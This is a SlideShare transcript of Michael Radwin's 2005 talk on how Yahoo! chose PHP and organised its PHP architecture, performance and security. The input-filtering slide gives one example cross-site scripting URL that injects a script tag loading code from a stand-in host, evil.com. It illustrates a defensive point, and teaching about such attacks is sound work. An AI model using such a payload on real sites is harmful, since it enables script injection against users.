SlideShare a Scribd company logo
PHP at Yahoo!
    http://public.yahoo.com/~radwin/



          Michael J. Radwin
            October 20, 2005

1
Outline

    • Yahoo!, as seen by an engineer
    • Choosing PHP in 2002
    • PHP architecture at Yahoo!




2
The Internet’s most trafficked site




3
25 countries, 13 languages




4
Yahoo! by the Numbers

    • 411M unique visitors per month
    • 191M active registered users
    • 11.4M fee-paying customers
    • 3.4B average daily pageviews




    October 2005

5
6
Engineering Values

    1.       Security & Privacy
         –      We must protect our customers’ information
    2.       High Availability
         –      If the site is offline, we’re missing the opportunity
                to serve our customers
    3.       Performance
         –      We serve billions of pageviews a day
    4.       Flexibility & Innovation
         –      Customize site for each market
         –      Rapid development of new features

7
From Proprietary to Open Source

               94 95 96 97 98 99 00 01 02 03 04 05



     Web
    Server                   Apache
             “Filo Server”

       DB
              Flat Files

     Web
     Lang
              yScript


8
Choosing a Language
How and Why We Selected PHP




                              9
Choosing PHP: brief history

     • October 2001: 3 proprietary languages
       – Costly to continue to maintain each
       – Limited features (no subroutines!)
     • Committee began researching
       – Compare features, performance
       – Build vs. Buy vs. Open Source
     • PHP selected May 2002
10
Ideal Language Criteria

     1. High performance         8. Interpreted or
     2. Robust, sand-boxed          dynamically compiled

     3. Language features        9. i18n support
       •   Loops, conditionals   10. Clean separation of
                                     presentation/content/
       •   Complex data-types
                                     app semantics
     4. C/C++ extensions
                                 11. Low training costs
     5. Runs on FreeBSD
                                 12. Doesn’t require CS
                                     degree to use


11
Top 10 Language Choices



                                 yScript




                           mod_include




            XSLT

12
Performance: Requests

                                     Requests/sec

               350
               300
               250                                          PHP
               200                                          YSP
                                                            mod_perl
       req/s




               150                                          HF2k
                                                            yScript
               100                                          Network max
               50
                0
                     25   50   75 100 150 200 300 400 500
                               Concurrent requests


13
Performance: Memory

                                           Active Virtual Memory

                       1000000

                       800000
       kbytes active




                       600000                                              PHP
                                                                           YSP
                                                                           mod_perl
                       400000                                              HF2k
                                                                           yScript
                       200000

                            0
                                 25   50    75   100 150 200 300 400 500
                                             Concurrent requests


14
Why we picked PHP

     1.       Designed for web scripting
     2.       High performance
     3.       Large, Open Source community
          •     Documentation, easy to hire developers
     4.       “Code-in-HTML” paradigm
                <html>
                <?php echo "Hello World"; ?>
                </html>

     5.       Integration, libraries, extensibility
     6.       Tools: IDE, debugger, profiler

15
PHP at Yahoo! Today




                      16
Yahoo!’s Development Methodology

     • Server Architecture
     • File Layout
     • Dependency Management
     • Security
     • Performance
     • Globalization

17
Server Architecture

                          Web Server
                          web server
                           web server
          Load Balancer


                              Scripts




                                                    User
                                                   Profile
                          Apache         Web       Server
                                        Services

                                                    Ad
                                                   Server



18
File Layout


               HTML Templates              95% HTML

          /usr/local/share/htdocs/*.php    5% PHP


              Template Helpers             50% HTML

          /usr/local/share/htdocs/*.inc    50% PHP



               Business Logic              0% HTML

          /usr/local/share/pear/*.inc      100% PHP



              C/C++ Core Code              0% HTML

         Data access, Networking, Crypto   0% PHP




19
Dependency Management

               •   Base PHP package depends only on
                   XML parser
                   ./configure --disable-all
               •   Self-Contained Extensions
                   –   mysql, dba, curl, ldap, pcre, gd, iconv
                   –   To enable
                       1. Install
                          /usr/local/lib/php/20020429/
                          mysql.so
                       2. Add “extension = mysql.so” to
                          php.ini
                   –   Avoids unnecessary dependencies
                   –   Smaller Apache memory footprint


20
Security: INI Settings

     • open_basedir
       – Insurance against /etc/passwd exploits
     • allow_url_fopen = Off
       – Use libcurl extension instead
       – Avoid open proxy exploits
     • display_errors = Off
       – However, log_errors = On
     • safe_mode = Off
       – Intended for shared hosting environment


21
Security: Input Filtering

     http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js>

     • Cross Site Scripting (XSS) most common attack
        – Also “SQL Injection”
     • Normal approach
        – strip_tags()
        – mysqli_escape_string()
        – Examine every line code
        – Tedious and error-prone
     • Use input_filter hook
        – Sanitize all user-submitted data
        – GET/POST/Cookie
22
Performance: Opcode Caches

     • Easiest performance boost
       – Cache parsed .php scripts
         in shared memory
       – Optimizations
       – No code modifications!
     • Several products available
       – Zend Performance Suite
       – APC
       – Turck MMCache
23
Performance: PHP Extensions in C++

     • PHP ships with 80
       extensions written in C/C++
     • Yahoo! develops its own
       proprietary extensions
        – Fast execution speed
        – Access to client libraries
     • Longer development cycle
        – Edit, compile, link, debug
        – Manual memory-
          management
24
Globalization: PHP Unicode

                +        +    ICU   =   6

     • Native Unicode support in 2006
     • Collaborative effort
       – Andrei Zmievski (Yahoo!)
       – Andi Gutmans (Zend)
       – Many members of PHP Community

25
26

More Related Content

What's hot (11)

PPTX
Php reports sumit
Sumit Biswas
 
PPT
PHP on Windows - What's New
ZendCon
 
KEY
Mason 2 - July 2011 - Seattle Perl Users Group
jonswar
 
PDF
PHP Batch Jobs on IBM i
Alan Seiden
 
PDF
Professional Frontend Engineering
Nate Koechley
 
PDF
Web Performance First Aid
Alan Seiden
 
KEY
Introduction to eXo ECM Suite
Tugdual Grall
 
PDF
Qcon
adityaagarwal
 
PPT
Website designing company_in_delhi_phpwebdevelopment
Css Founder
 
PDF
USP presentation of CHOReOS @ FISL Conference
choreos
 
PDF
Apache2 BootCamp : Using Apache to Serve Static Content
Wildan Maulana
 
Php reports sumit
Sumit Biswas
 
PHP on Windows - What's New
ZendCon
 
Mason 2 - July 2011 - Seattle Perl Users Group
jonswar
 
PHP Batch Jobs on IBM i
Alan Seiden
 
Professional Frontend Engineering
Nate Koechley
 
Web Performance First Aid
Alan Seiden
 
Introduction to eXo ECM Suite
Tugdual Grall
 
Website designing company_in_delhi_phpwebdevelopment
Css Founder
 
USP presentation of CHOReOS @ FISL Conference
choreos
 
Apache2 BootCamp : Using Apache to Serve Static Content
Wildan Maulana
 

Viewers also liked (6)

PPTX
Shirley
guest805d02
 
PDF
Treading the PHPath
Rafael Dohms
 
PPT
Civilmedia07 Free Radio Germany Stefan Tenner
stenner
 
PDF
PHP Annotations: They exist! - JetBrains Webinar
Rafael Dohms
 
PDF
Enterprise PHP (php|works 2008)
Ivo Jansch
 
PDF
Teach a Man To Fish (phpconpl edition)
Lorna Mitchell
 
Shirley
guest805d02
 
Treading the PHPath
Rafael Dohms
 
Civilmedia07 Free Radio Germany Stefan Tenner
stenner
 
PHP Annotations: They exist! - JetBrains Webinar
Rafael Dohms
 
Enterprise PHP (php|works 2008)
Ivo Jansch
 
Teach a Man To Fish (phpconpl edition)
Lorna Mitchell
 
Ad

Similar to PHP at Yahoo! (20)

PPT
Phpyahoo
cainacinacniacnian
 
PPTX
Chapter onehsfhjfgjhdjhdhfsGfhghsgasg (2).pptx
berihun18
 
PDF
Integrating PHP With System-i using Web Services
Ivo Jansch
 
PDF
Decoupling Content Management with Create.js and PHPCR
Henri Bergius
 
PPTX
Introduction to php
shanmukhareddy dasi
 
PPTX
Northeast PHP - High Performance PHP
Jonathan Klein
 
PDF
Scaling with Symfony - PHP UK
Ricard Clau
 
PDF
Lamp Introduction 20100419
Vu Hung Nguyen
 
PDF
High Performance Drupal Sites
Abayomi Ayoola
 
PDF
01/2009 - Portral development with liferay
daveayan
 
PPTX
Apache Performance Tuning: Scaling Up
Sander Temme
 
PPT
Php
Ajay Kumar
 
PDF
Surviving a Plane Crash, a NU.nl case-study
peter_ibuildings
 
PDF
PHP Web Development Frameworks & Advantages
AditMicrosys Australia
 
PDF
PHP is the King, nodejs is the Prince and Lua is the fool
Alessandro Cinelli (cirpo)
 
PDF
Ipc mysql php
Anis Berejeb
 
PPTX
Web technologies lesson 1
nhepner
 
PDF
Vaadin - Rich Web Applications in Server-side Java without Plug-ins or JavaSc...
Joonas Lehtinen
 
PDF
PHP and the Cloud: The view from the bazaar
vitoc
 
PPTX
Realtime traffic analyser
Alex Moskvin
 
Chapter onehsfhjfgjhdjhdhfsGfhghsgasg (2).pptx
berihun18
 
Integrating PHP With System-i using Web Services
Ivo Jansch
 
Decoupling Content Management with Create.js and PHPCR
Henri Bergius
 
Introduction to php
shanmukhareddy dasi
 
Northeast PHP - High Performance PHP
Jonathan Klein
 
Scaling with Symfony - PHP UK
Ricard Clau
 
Lamp Introduction 20100419
Vu Hung Nguyen
 
High Performance Drupal Sites
Abayomi Ayoola
 
01/2009 - Portral development with liferay
daveayan
 
Apache Performance Tuning: Scaling Up
Sander Temme
 
Surviving a Plane Crash, a NU.nl case-study
peter_ibuildings
 
PHP Web Development Frameworks & Advantages
AditMicrosys Australia
 
PHP is the King, nodejs is the Prince and Lua is the fool
Alessandro Cinelli (cirpo)
 
Ipc mysql php
Anis Berejeb
 
Web technologies lesson 1
nhepner
 
Vaadin - Rich Web Applications in Server-side Java without Plug-ins or JavaSc...
Joonas Lehtinen
 
PHP and the Cloud: The view from the bazaar
vitoc
 
Realtime traffic analyser
Alex Moskvin
 
Ad

More from elliando dias (20)

PDF
Clojurescript slides
elliando dias
 
PDF
Why you should be excited about ClojureScript
elliando dias
 
PDF
Functional Programming with Immutable Data Structures
elliando dias
 
PPT
Nomenclatura e peças de container
elliando dias
 
PDF
Geometria Projetiva
elliando dias
 
PDF
Polyglot and Poly-paradigm Programming for Better Agility
elliando dias
 
PDF
Javascript Libraries
elliando dias
 
PDF
How to Make an Eight Bit Computer and Save the World!
elliando dias
 
PDF
Ragel talk
elliando dias
 
PDF
A Practical Guide to Connecting Hardware to the Web
elliando dias
 
PDF
Introdução ao Arduino
elliando dias
 
PDF
Minicurso arduino
elliando dias
 
PDF
Incanter Data Sorcery
elliando dias
 
PDF
Rango
elliando dias
 
PDF
Fab.in.a.box - Fab Academy: Machine Design
elliando dias
 
PDF
The Digital Revolution: Machines that makes
elliando dias
 
PDF
Hadoop + Clojure
elliando dias
 
PDF
Hadoop - Simple. Scalable.
elliando dias
 
PDF
Hadoop and Hive Development at Facebook
elliando dias
 
PDF
Multi-core Parallelization in Clojure - a Case Study
elliando dias
 
Clojurescript slides
elliando dias
 
Why you should be excited about ClojureScript
elliando dias
 
Functional Programming with Immutable Data Structures
elliando dias
 
Nomenclatura e peças de container
elliando dias
 
Geometria Projetiva
elliando dias
 
Polyglot and Poly-paradigm Programming for Better Agility
elliando dias
 
Javascript Libraries
elliando dias
 
How to Make an Eight Bit Computer and Save the World!
elliando dias
 
Ragel talk
elliando dias
 
A Practical Guide to Connecting Hardware to the Web
elliando dias
 
Introdução ao Arduino
elliando dias
 
Minicurso arduino
elliando dias
 
Incanter Data Sorcery
elliando dias
 
Fab.in.a.box - Fab Academy: Machine Design
elliando dias
 
The Digital Revolution: Machines that makes
elliando dias
 
Hadoop + Clojure
elliando dias
 
Hadoop - Simple. Scalable.
elliando dias
 
Hadoop and Hive Development at Facebook
elliando dias
 
Multi-core Parallelization in Clojure - a Case Study
elliando dias
 

Recently uploaded (20)

PPTX
"Autonomy of LLM Agents: Current State and Future Prospects", Oles` Petriv
Fwdays
 
PDF
DevBcn - Building 10x Organizations Using Modern Productivity Metrics
Justin Reock
 
PDF
LOOPS in C Programming Language - Technology
RishabhDwivedi43
 
PDF
CIFDAQ Token Spotlight for 9th July 2025
CIFDAQ
 
PDF
POV_ Why Enterprises Need to Find Value in ZERO.pdf
darshakparmar
 
PDF
The Rise of AI and IoT in Mobile App Tech.pdf
IMG Global Infotech
 
PPTX
COMPARISON OF RASTER ANALYSIS TOOLS OF QGIS AND ARCGIS
Sharanya Sarkar
 
PDF
"AI Transformation: Directions and Challenges", Pavlo Shaternik
Fwdays
 
PDF
Advancing WebDriver BiDi support in WebKit
Igalia
 
PDF
[Newgen] NewgenONE Marvin Brochure 1.pdf
darshakparmar
 
PDF
Go Concurrency Real-World Patterns, Pitfalls, and Playground Battles.pdf
Emily Achieng
 
PDF
New from BookNet Canada for 2025: BNC BiblioShare - Tech Forum 2025
BookNet Canada
 
PPTX
AI Penetration Testing Essentials: A Cybersecurity Guide for 2025
defencerabbit Team
 
PDF
Reverse Engineering of Security Products: Developing an Advanced Microsoft De...
nwbxhhcyjv
 
PPTX
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
PDF
Smart Trailers 2025 Update with History and Overview
Paul Menig
 
DOCX
Python coding for beginners !! Start now!#
Rajni Bhardwaj Grover
 
PDF
July Patch Tuesday
Ivanti
 
PDF
CIFDAQ Market Insights for July 7th 2025
CIFDAQ
 
PDF
Biography of Daniel Podor.pdf
Daniel Podor
 
"Autonomy of LLM Agents: Current State and Future Prospects", Oles` Petriv
Fwdays
 
DevBcn - Building 10x Organizations Using Modern Productivity Metrics
Justin Reock
 
LOOPS in C Programming Language - Technology
RishabhDwivedi43
 
CIFDAQ Token Spotlight for 9th July 2025
CIFDAQ
 
POV_ Why Enterprises Need to Find Value in ZERO.pdf
darshakparmar
 
The Rise of AI and IoT in Mobile App Tech.pdf
IMG Global Infotech
 
COMPARISON OF RASTER ANALYSIS TOOLS OF QGIS AND ARCGIS
Sharanya Sarkar
 
"AI Transformation: Directions and Challenges", Pavlo Shaternik
Fwdays
 
Advancing WebDriver BiDi support in WebKit
Igalia
 
[Newgen] NewgenONE Marvin Brochure 1.pdf
darshakparmar
 
Go Concurrency Real-World Patterns, Pitfalls, and Playground Battles.pdf
Emily Achieng
 
New from BookNet Canada for 2025: BNC BiblioShare - Tech Forum 2025
BookNet Canada
 
AI Penetration Testing Essentials: A Cybersecurity Guide for 2025
defencerabbit Team
 
Reverse Engineering of Security Products: Developing an Advanced Microsoft De...
nwbxhhcyjv
 
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
Smart Trailers 2025 Update with History and Overview
Paul Menig
 
Python coding for beginners !! Start now!#
Rajni Bhardwaj Grover
 
July Patch Tuesday
Ivanti
 
CIFDAQ Market Insights for July 7th 2025
CIFDAQ
 
Biography of Daniel Podor.pdf
Daniel Podor
 

PHP at Yahoo!

  • 1. PHP at Yahoo! http://public.yahoo.com/~radwin/ Michael J. Radwin October 20, 2005 1
  • 2. Outline • Yahoo!, as seen by an engineer • Choosing PHP in 2002 • PHP architecture at Yahoo! 2
  • 3. The Internet’s most trafficked site 3
  • 4. 25 countries, 13 languages 4
  • 5. Yahoo! by the Numbers • 411M unique visitors per month • 191M active registered users • 11.4M fee-paying customers • 3.4B average daily pageviews October 2005 5
  • 6. 6
  • 7. Engineering Values 1. Security & Privacy – We must protect our customers’ information 2. High Availability – If the site is offline, we’re missing the opportunity to serve our customers 3. Performance – We serve billions of pageviews a day 4. Flexibility & Innovation – Customize site for each market – Rapid development of new features 7
  • 8. From Proprietary to Open Source 94 95 96 97 98 99 00 01 02 03 04 05 Web Server Apache “Filo Server” DB Flat Files Web Lang yScript 8
  • 9. Choosing a Language How and Why We Selected PHP 9
  • 10. Choosing PHP: brief history • October 2001: 3 proprietary languages – Costly to continue to maintain each – Limited features (no subroutines!) • Committee began researching – Compare features, performance – Build vs. Buy vs. Open Source • PHP selected May 2002 10
  • 11. Ideal Language Criteria 1. High performance 8. Interpreted or 2. Robust, sand-boxed dynamically compiled 3. Language features 9. i18n support • Loops, conditionals 10. Clean separation of presentation/content/ • Complex data-types app semantics 4. C/C++ extensions 11. Low training costs 5. Runs on FreeBSD 12. Doesn’t require CS degree to use 11
  • 12. Top 10 Language Choices yScript mod_include XSLT 12
  • 13. Performance: Requests Requests/sec 350 300 250 PHP 200 YSP mod_perl req/s 150 HF2k yScript 100 Network max 50 0 25 50 75 100 150 200 300 400 500 Concurrent requests 13
  • 14. Performance: Memory Active Virtual Memory 1000000 800000 kbytes active 600000 PHP YSP mod_perl 400000 HF2k yScript 200000 0 25 50 75 100 150 200 300 400 500 Concurrent requests 14
  • 15. Why we picked PHP 1. Designed for web scripting 2. High performance 3. Large, Open Source community • Documentation, easy to hire developers 4. “Code-in-HTML” paradigm <html> <?php echo "Hello World"; ?> </html> 5. Integration, libraries, extensibility 6. Tools: IDE, debugger, profiler 15
  • 16. PHP at Yahoo! Today 16
  • 17. Yahoo!’s Development Methodology • Server Architecture • File Layout • Dependency Management • Security • Performance • Globalization 17
  • 18. Server Architecture Web Server web server web server Load Balancer Scripts User Profile Apache Web Server Services Ad Server 18
  • 19. File Layout HTML Templates 95% HTML /usr/local/share/htdocs/*.php 5% PHP Template Helpers 50% HTML /usr/local/share/htdocs/*.inc 50% PHP Business Logic 0% HTML /usr/local/share/pear/*.inc 100% PHP C/C++ Core Code 0% HTML Data access, Networking, Crypto 0% PHP 19
  • 20. Dependency Management • Base PHP package depends only on XML parser ./configure --disable-all • Self-Contained Extensions – mysql, dba, curl, ldap, pcre, gd, iconv – To enable 1. Install /usr/local/lib/php/20020429/ mysql.so 2. Add “extension = mysql.so” to php.ini – Avoids unnecessary dependencies – Smaller Apache memory footprint 20
  • 21. Security: INI Settings • open_basedir – Insurance against /etc/passwd exploits • allow_url_fopen = Off – Use libcurl extension instead – Avoid open proxy exploits • display_errors = Off – However, log_errors = On • safe_mode = Off – Intended for shared hosting environment 21
  • 22. Security: Input Filtering http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js> • Cross Site Scripting (XSS) most common attack – Also “SQL Injection” • Normal approach – strip_tags() – mysqli_escape_string() – Examine every line code – Tedious and error-prone • Use input_filter hook – Sanitize all user-submitted data – GET/POST/Cookie 22
  • 23. Performance: Opcode Caches • Easiest performance boost – Cache parsed .php scripts in shared memory – Optimizations – No code modifications! • Several products available – Zend Performance Suite – APC – Turck MMCache 23
  • 24. Performance: PHP Extensions in C++ • PHP ships with 80 extensions written in C/C++ • Yahoo! develops its own proprietary extensions – Fast execution speed – Access to client libraries • Longer development cycle – Edit, compile, link, debug – Manual memory- management 24
  • 25. Globalization: PHP Unicode + + ICU = 6 • Native Unicode support in 2006 • Collaborative effort – Andrei Zmievski (Yahoo!) – Andi Gutmans (Zend) – Many members of PHP Community 25
  • 26. 26